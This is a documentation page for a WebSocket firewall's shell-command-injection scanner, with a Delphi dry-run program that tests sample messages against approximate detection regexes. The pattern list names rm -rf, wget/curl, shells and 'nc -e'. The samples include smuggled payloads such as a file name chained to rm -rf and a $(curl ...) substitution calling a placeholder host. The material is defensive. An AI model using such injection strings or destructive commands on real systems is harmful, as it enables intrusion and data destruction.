TsgcWebSocketFirewall › Properties › CommandInjection
Scans inbound messages for shell command injection patterns and denies, allows or logs them according to Action.
property CommandInjection: TsgcFirewallCommandInjection read FCommandInjection write SetCommandInjection;
Set CommandInjection.Enabled to True to run the built-in scanner for shell-injection patterns. It recognises chaining operators (;, |, &&, ||), backtick and $(...) execution, destructive commands (rm -rf), remote downloaders (wget, curl), Unix shells (/bin/sh, /bin/bash), cmd.exe and powershell. Extra expressions can be supplied through CustomPatterns. Action controls the response: faDeny rejects the message, faAllow forwards it and faLog only fires OnViolation with type fvCommandInjection. Matches feed ThreatScore through WeightCommandInjection. Default: Action = faDeny.
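// Turn the scanner on and reject any message that matches
sgcWebSocketFirewall1.CommandInjection.Enabled := True;
sgcWebSocketFirewall1.CommandInjection.Action := faDeny;
// Add an extra expression on top of the built-in patterns
sgcWebSocketFirewall1.CommandInjection.CustomPatterns.Add('nc -e');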
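
Added example, not sgcWebSockets code: a stand-alone dry run that checks constructed sample messages against the pattern categories listed above, to show which legitimate payloads a faDeny policy would also reject. The regular expressions, the Names labels and FirstMatch are hypothetical approximations; the component's actual expressions are not shown on this page.

```delphi
program CmdInjectionDryRun;
{$APPTYPE CONSOLE}
uses
  System.SysUtils, System.RegularExpressions;

const
  // Hypothetical approximations of the documented categories (assumption:
  // a pattern may match anywhere in the message text).
  Patterns: array[0..4] of string = (
    '(;|&&|\|\||\|)',                              // chaining operators
    '`[^`]*`|\$\([^)]*\)',                         // backtick and $(...) execution
    '\brm\s+-rf\b',                                // destructive command
    '\b(wget|curl)\b',                             // remote downloaders
    '/bin/(ba)?sh\b|\bcmd\.exe\b|\bpowershell\b'); // shells
  Names: array[0..4] of string =
    ('chaining', 'substitution', 'destructive', 'downloader', 'shell');
  // Constructed sample messages: expected verdict, then payload.
  Samples: array[0..4, 0..1] of string = (
    ('benign',  '{"op":"subscribe","channel":"ticker"}'),
    ('benign',  'Thanks; see you at 5 | room B'),
    ('benign',  'if (a && b) return;'),
    ('hostile', 'report.pdf; rm -rf /tmp/cache'),
    ('hostile', 'name=$(curl http://example.invalid/x)'));

// Returns the first matching category name, or '' when nothing matches.
function FirstMatch(const Msg: string): string;
var
  I: Integer;
begin
  Result := '';
  for I := Low(Patterns) to High(Patterns) do
    if TRegEx.IsMatch(Msg, Patterns[I], [roIgnoreCase]) then
      Exit(Names[I]);
end;

var
  I, FalsePos, Missed: Integer;
  Hit: string;
begin
  FalsePos := 0;
  Missed := 0;
  for I := 0 to High(Samples) do
  begin
    Hit := FirstMatch(Samples[I, 1]);
    if (Hit <> '') and (Samples[I, 0] = 'benign') then Inc(FalsePos);
    if (Hit = '') and (Samples[I, 0] = 'hostile') then Inc(Missed);
    if Hit = '' then Hit := 'clean';
    Writeln(Format('%-8s %-13s %s', [Samples[I, 0], Hit, Samples[I, 1]]));
  end;
  Writeln(Format('false positives: %d, missed: %d', [FalsePos, Missed]));
end.
```

Benign messages flagged here are the ones a faDeny policy would drop under these assumed patterns. Running the component with Action set to faLog against real traffic and reviewing the OnViolation events gives the same picture before enforcement.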